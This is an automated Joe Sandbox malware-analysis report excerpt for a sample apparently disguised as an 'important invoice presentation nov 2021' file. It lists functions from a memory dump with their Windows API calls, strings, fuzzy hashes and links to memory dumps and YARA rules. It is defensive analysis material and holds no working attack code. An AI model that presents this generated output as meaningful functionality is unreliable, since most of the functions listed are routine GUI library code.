Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab1cefa08610e0ff2b61a44fb00a26c069612a0efa1ca8fe028bf71063dced8
Instruction ID: 50b25065c8bd6dbc7a89f2cff44f6882b478e993527ec84e937ba3f13b708ea7
Opcode Fuzzy Hash: cab1cefa08610e0ff2b61a44fb00a26c069612a0efa1ca8fe028bf71063dced8
Instruction Fuzzy Hash: 5981273580011AEBCF21AFA4CC95EEEB7B9EF49710F1041A9F91563291DB74AE45DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00BD6F54, Relevance: 15.1, APIs: 10, Instructions: 95threadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00BD6F6F
WindowFromPoint.USER32(?,00000000), ref: 00BD6F7D
GetActiveWindow.USER32 ref: 00BD6F9E
GetCurrentThreadId.KERNEL32 ref: 00BD6FB8
GetWindowThreadProcessId.USER32(?,00000000), ref: 00BD6FC8
GetDesktopWindow.USER32 ref: 00BD6FDD

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$Thread$ActiveCaptureCurrentDesktopFromPointProcess
String ID:
API String ID: 1298419125-0
Opcode ID: 30972e44468a9786ed1664f8ef8af48aabe8e42a33a33cdec9dfbfd28a3ffe7f
Instruction ID: 54ce990458046cb2bf23d0f520f4fc6dfda6a09207e57c1591b2194efe2ca88b
Opcode Fuzzy Hash: 30972e44468a9786ed1664f8ef8af48aabe8e42a33a33cdec9dfbfd28a3ffe7f
Instruction Fuzzy Hash: 21313B71A44615EBDF259BB0D888AEDFBF4FB08341F1045A6E502E3391FB74A941DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE06E9, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001005,00000000,?), ref: 00BE071E
CreatePopupMenu.USER32(?,?,00000001,?,00DF6904,00000000,?,?,00000001,?,?), ref: 00BE07DA
GetMenuDefaultItem.USER32 ref: 00BE0819
GetParent.USER32(?), ref: 00BE0843
GetParent.USER32(?), ref: 00BE0897
GetParent.USER32(?), ref: 00BE08AA
SendMessageA.USER32(?,?,00000000,00000000), ref: 00BE08C4

Strings

$, xrefs: 00BE083C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Parent$MenuMessageSend$CreateDefaultItemPopup
String ID: $
API String ID: 3883924376-3993045852
Opcode ID: 8b18c02797166a3d6e578e159181237e11c1cfe0931f4ef936fd03096c8f53c8
Instruction ID: d1a64d5faef1040debbb6476b78a99d54ef9c6cf70539d63c850ad5482a54246
Opcode Fuzzy Hash: 8b18c02797166a3d6e578e159181237e11c1cfe0931f4ef936fd03096c8f53c8
Instruction Fuzzy Hash: 23514D71A00219EFDB119FA5CC84B9EBBF9FF08710F1442A9E905E72A0DB759941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BAAE42, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 118libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Comctl32.dll,00000000,00000000,00000002,Comctl32.dll,00000040), ref: 00BAAFD8

Part of subcall function 00BAAD71: GetProcAddress.KERNEL32(00000000,?), ref: 00BAAD9F

GetModuleFileNameW.KERNEL32(?,?,00000105,?,00BAA4AA,00E19318,00E18508,00000014,00BBDECF,InitCommonControlsEx,00E19318,00000010,00BBCABE,00000008,00000000), ref: 00BAAEF2
SetLastError.KERNEL32(0000006F,?,00BAA4AA,00E19318,00E18508,00000014,00BBDECF,InitCommonControlsEx,00E19318,00000010,00BBCABE,00000008,00000000,?,00BB7175,00000008), ref: 00BAAF06
GetLastError.KERNEL32(00000020), ref: 00BAAF5D

Strings

@Mxt, xrefs: 00BAAF5D
<, xrefs: 00BAAE7F
Comctl32.dll, xrefs: 00BAAFC4, 00BAAFC9, 00BAAFD7
GetModuleHandleExW, xrefs: 00BAAEA5

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
String ID: <$@Mxt$Comctl32.dll$GetModuleHandleExW
API String ID: 3640817601-1591237946
Opcode ID: 4525ed06f29179b206ea9be7ee241531c17fd0c41a7eb8c47c3489b67b8d32b2
Instruction ID: 89a1214e3a4d666c99aa4fe2027782727208e89a78ec6dc1f2246c027e4f9f6b
Opcode Fuzzy Hash: 4525ed06f29179b206ea9be7ee241531c17fd0c41a7eb8c47c3489b67b8d32b2
Instruction Fuzzy Hash: 7F41A3B19083159EDB349B649C89BADB7F8EB46711F1002E6F405E22D0DB758E84CF72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBED29, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CBED30

Part of subcall function 00BC6590: EnterCriticalSection.KERNEL32(00E48118,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65C1
Part of subcall function 00BC6590: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65D7
Part of subcall function 00BC6590: LeaveCriticalSection.KERNEL32(00E48118,?,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65E5
Part of subcall function 00BC6590: EnterCriticalSection.KERNEL32(00000000,?,?,?,00BC2B2B,00000010,00000008,00BB22AD,00BB2359,00BA36A1,00BB22BC,00BAD286,00DA67F3), ref: 00BC65F2

GetProfileIntA.KERNEL32 ref: 00CBED7B
GetProfileIntA.KERNEL32 ref: 00CBED8E
GetProfileIntA.KERNEL32 ref: 00CBEDA1

Strings

DragScrollInset, xrefs: 00CBED70
DragScrollDelay, xrefs: 00CBED83
windows, xrefs: 00CBED75, 00CBED7A, 00CBED88, 00CBED9B
DragScrollInterval, xrefs: 00CBED96

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$windows
API String ID: 4229786687-1024936294
Opcode ID: 9d32f9393ac02f5c7ae459670923cac4fd2e54e788efd26581ad091956156646
Instruction ID: 04d349549feba2a4812ba13f5cd78dde87aa415d6e4fe9c8f15ad44121110e75
Opcode Fuzzy Hash: 9d32f9393ac02f5c7ae459670923cac4fd2e54e788efd26581ad091956156646
Instruction Fuzzy Hash: 04011AB0941344DFD761FF669D45B5A7BE4BB49B04F00092EE245E7392E7F44489CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00BF0DCC, Relevance: 13.9, APIs: 9, Instructions: 358windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF0DD3
SendMessageA.USER32(?,000000B0,?,?), ref: 00BF0DED
MessageBeep.USER32(000000FF), ref: 00BF101C
SendMessageA.USER32(?,000000C2,00000001,?), ref: 00BF0FD8

Part of subcall function 00BAF7A2: RegCloseKey.ADVAPI32(?,?,80070057), ref: 00BAF7D0

MessageBeep.USER32(000000FF), ref: 00BF11E2

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Message$BeepSend$CloseH_prolog3
String ID:
API String ID: 1335387087-0
Opcode ID: 474fb84aa5c741a4b0dbf7327ef433e892bcbd0a7a73fcb9cbe515af9fe5b5bc
Instruction ID: 9db826c29440aac96d24690bbe90408900ace4fa2d388bd91fc2ebc2ed3184a4
Opcode Fuzzy Hash: 474fb84aa5c741a4b0dbf7327ef433e892bcbd0a7a73fcb9cbe515af9fe5b5bc
Instruction Fuzzy Hash: 1BD13871A0011AEBCF14EBA8C985AFEBBBAFF48300F144595E611B3291DB346D49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2A50, Relevance: 13.8, APIs: 9, Instructions: 317windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001009,00000000,00000000), ref: 00BA2ACA
SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00BA2AF2
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00BA2B18
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00BA2B32
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104,?,?,00000000), ref: 00BA2BC2
#3.ACTIVEDS(?,00DC01CC,00000000,?,?,00000000), ref: 00BA2BDB
SysFreeString.OLEAUT32(?), ref: 00BA2C8B

Part of subcall function 00B9DFA0: WideCharToMultiByte.KERNEL32(00000003,00000000,00BA787A,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,?,00BA787A,?), ref: 00B9DFBE
Part of subcall function 00B9DFA0: WideCharToMultiByte.KERNEL32(00000003,00000000,00BA787A,000000FF,00000014,-00000001,00000000,00000000,?,00BA787A,?), ref: 00B9DFF4

Part of subcall function 00BA9B5C: SendMessageA.USER32(?,00001007,00000000,?), ref: 00BA9B9E

Part of subcall function 00BAA306: SendMessageA.USER32(?,0000102E,00DC01CC,00BA2D30), ref: 00BAA327

SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00BA2E78
SendMessageA.USER32(?,00001009,00000000,00000000), ref: 00BA2E8D

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$ByteCharMultiWide$FreeString
String ID:
API String ID: 1502876466-0
Opcode ID: ba99a8c8fffc93d54e1c0770eebf0e838ab34fb92ef0822743d7526a9d3ddbfe
Instruction ID: 47681cf0752efe30f695b846cac8d59311f5fb691e7cba8db47767b52331f239
Opcode Fuzzy Hash: ba99a8c8fffc93d54e1c0770eebf0e838ab34fb92ef0822743d7526a9d3ddbfe
Instruction Fuzzy Hash: 9EC17070A01209AFDB10DF68DC89B9DB7F5EF45314F1442E8E509AB2A2DB70AE45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BFAD0B, Relevance: 13.7, APIs: 9, Instructions: 214COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32 ref: 00BFADA5
InvalidateRect.USER32(?,?,00000001), ref: 00BFAE01
InvalidateRect.USER32(?,?,00000001), ref: 00BFAE10

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$Invalidate$Empty
String ID:
API String ID: 1126320529-0
Opcode ID: 5c83749cb136ae30b10dfef8e0dc0cb9b960b458042daa5363a5cb892e7f529b
Instruction ID: ab654fd9850b342bdaaec3d80e2f3a7ea7642fc24d8a59e3fcaedbf9ec12c723
Opcode Fuzzy Hash: 5c83749cb136ae30b10dfef8e0dc0cb9b960b458042daa5363a5cb892e7f529b
Instruction Fuzzy Hash: 15810475A00219DFDF09DF64C884AEDBBB6EF48310F1441A9E905AB360DB71AE45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BE883E, Relevance: 13.7, APIs: 9, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC8C4F: GetFocus.USER32 ref: 00BC8C53
Part of subcall function 00BC8C4F: GetParent.USER32(00000000), ref: 00BC8C74
Part of subcall function 00BC8C4F: GetWindowLongA.USER32 ref: 00BC8C93
Part of subcall function 00BC8C4F: GetParent.USER32(?), ref: 00BC8CA1
Part of subcall function 00BC8C4F: GetDesktopWindow.USER32 ref: 00BC8CA9
Part of subcall function 00BC8C4F: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 00BC8CBD

GetMenu.USER32(?), ref: 00BE88BF
GetMenuItemCount.USER32 ref: 00BE88FD
GetSubMenu.USER32 ref: 00BE8913
GetMenuItemCount.USER32 ref: 00BE8938
GetMenuItemID.USER32(?,00000000), ref: 00BE8952
GetSubMenu.USER32 ref: 00BE896E
GetMenuItemID.USER32(?,00000000), ref: 00BE8986
GetMenuItemCount.USER32 ref: 00BE89A7
GetMenuItemID.USER32(?,?), ref: 00BE89DD

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 6a604dcd1c98e0db692d80b7527ee7eb2a26d31c1d7eb3b153c476839fb1e295
Instruction ID: 992b0654392cd9a302ee3cfd20335ce10d157a807e262d272a49266688959f1e
Opcode Fuzzy Hash: 6a604dcd1c98e0db692d80b7527ee7eb2a26d31c1d7eb3b153c476839fb1e295
Instruction Fuzzy Hash: D3619B74E00A55EFCB159FA6C884ABDBBF5FF88310F1452A5E81AE7261DF309840DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C3C6C6, Relevance: 13.6, APIs: 9, Instructions: 133windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C6CD
GetObjectA.GDI32(00000000,00000018,?), ref: 00C3C6E4

Part of subcall function 00C3C623: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00C3C69A

CreateCompatibleDC.GDI32(00000000), ref: 00C3C764
SelectObject.GDI32(?,00000000), ref: 00C3C777
CreateCompatibleDC.GDI32(00000000), ref: 00C3C795
SelectObject.GDI32(?,?), ref: 00C3C7AA
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C3C7C9
SelectObject.GDI32(?,00000000), ref: 00C3C7D7
SelectObject.GDI32(?,00000000), ref: 00C3C7E1

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Select$Create$Compatible$H_prolog3Section
String ID:
API String ID: 2431383920-0
Opcode ID: c3c5942b397f327a35f44d347d12c8f97d89755db1deaafbd485381d58da736c
Instruction ID: 3bbc4186a66b9b896ea3e71924fa242cb56423b630a903c087e5a50f18b55ff0
Opcode Fuzzy Hash: c3c5942b397f327a35f44d347d12c8f97d89755db1deaafbd485381d58da736c
Instruction Fuzzy Hash: 88418C72D10219EFEB15AFA4CC85AFEBB75EF44310F114228F921B7290DB708A45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB865E, Relevance: 13.6, APIs: 9, Instructions: 121windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BB8668
SendMessageA.USER32(?,00000000,00000000,00000080), ref: 00BB86AF
SendMessageA.USER32(?,00000000,00000000,?), ref: 00BB86DB
ValidateRect.USER32(?,00000000), ref: 00BB86EE

Part of subcall function 00BCC5C2: GetClientRect.USER32 ref: 00BCC62D

GetClientRect.USER32 ref: 00BB8766
BeginPaint.USER32(?,?), ref: 00BB8773
SendMessageA.USER32(?,00000000,00000000,?), ref: 00BB87A9
SendMessageA.USER32(?,00000000,00000000), ref: 00BB87CB
EndPaint.USER32(?,?), ref: 00BB87E3

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$Rect$ClientPaint$BeginH_prolog3_Validate
String ID:
API String ID: 3883544035-0
Opcode ID: 89dd7f978be6090605371d69a587ad0f5ffcd252600de20ff400528544640de5
Instruction ID: a034056aa0c791ed4b6d52871bc7261c0f5478394ce8e48dc9bcfe91b3c00273
Opcode Fuzzy Hash: 89dd7f978be6090605371d69a587ad0f5ffcd252600de20ff400528544640de5
Instruction Fuzzy Hash: CC414875900645EBDF21AFA2DC85AEEBBF9FB88300F1041ADE156A2261DF709D14CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00BFC6D4, Relevance: 13.6, APIs: 9, Instructions: 120windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BFC6DB
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00BFC71D
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00BFC73D
SHGetDesktopFolder.SHELL32(?), ref: 00BFC75B
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00BFC78F
SendMessageA.USER32(?,00001115,00000000,?), ref: 00BFC7D1
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00BFC7DF
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,00DF6DC4,?), ref: 00BFC7EF
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00BFC831

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$DesktopFolderH_prolog3RedrawWindow
String ID:
API String ID: 1930222516-0
Opcode ID: 0338946c92b76e2328396ebaf399d3f256c7a81d353ed0f32a45c674a93b62f7
Instruction ID: d7b69e9c479069ff343e6c60164fb98b1cdafcf10d8378074e06f9b82dd84c5e
Opcode Fuzzy Hash: 0338946c92b76e2328396ebaf399d3f256c7a81d353ed0f32a45c674a93b62f7
Instruction Fuzzy Hash: DE414A75A00209EFDB149FA4DD85EEEBBB9FF48740F004165FA05A72A0DB709D54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C0464A, Relevance: 13.6, APIs: 9, Instructions: 106COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C04651
GetObjectA.GDI32(?,00000018,?), ref: 00C04668
CreateCompatibleDC.GDI32(00000000), ref: 00C04684
SelectObject.GDI32(?,?), ref: 00C04697
CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 00C046C0
GetPixel.GDI32(?,00000000,00000000), ref: 00C046E7
CreateRectRgn.GDI32(00000000,00000000,00000001,00000001), ref: 00C0470E
CombineRgn.GDI32(?,?,?,00000004), ref: 00C04728
SelectObject.GDI32(?,00000000), ref: 00C0475F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CreateObject$RectSelect$CombineCompatibleH_prolog3Pixel
String ID:
API String ID: 682634522-0
Opcode ID: 733058c6b818d27257935c6032e256de7231c9ce0e1cdab2fc1dacfb575810ff
Instruction ID: c739054d2361e26cf2f8ee83f5ca74ce9afaa3aeba1571abdabe7c833399e3e4
Opcode Fuzzy Hash: 733058c6b818d27257935c6032e256de7231c9ce0e1cdab2fc1dacfb575810ff
Instruction Fuzzy Hash: F3413971900259EBCF18DFA4CC89AEEBBB8AF55700F140168EA11B7250DBB45E45DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00BDE26E, Relevance: 13.6, APIs: 9, Instructions: 75windowkeyboardCOMMON

Download Yara Rule

APIs

GetPropA.USER32 ref: 00BDE28C
GlobalLock.KERNEL32 ref: 00BDE295
SendMessageA.USER32(?,00000476,00000000,00000000), ref: 00BDE2B0
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00BDA3E8,?,?), ref: 00BDE2BB
RemovePropA.USER32 ref: 00BDE2CA
GlobalFree.KERNEL32 ref: 00BDE2D5
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00BDA3E8,?,?), ref: 00BDE2F7
GetAsyncKeyState.USER32(00000011), ref: 00BDE308
SendMessageA.USER32(?,00000475,00000000,?), ref: 00BDE330

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Global$MessagePropSendUnlock$AsyncFreeLockRemoveState
String ID:
API String ID: 723318029-0
Opcode ID: 6ee8b1aa19bc3aec919c02dee54e13f4738bb080fe38bf04c534f95333a9ede3
Instruction ID: ddbf155ca555259f4d1da3ad77b6c6b1f3866a52ccf3fd4ec45fc38b1412d9a4
Opcode Fuzzy Hash: 6ee8b1aa19bc3aec919c02dee54e13f4738bb080fe38bf04c534f95333a9ede3
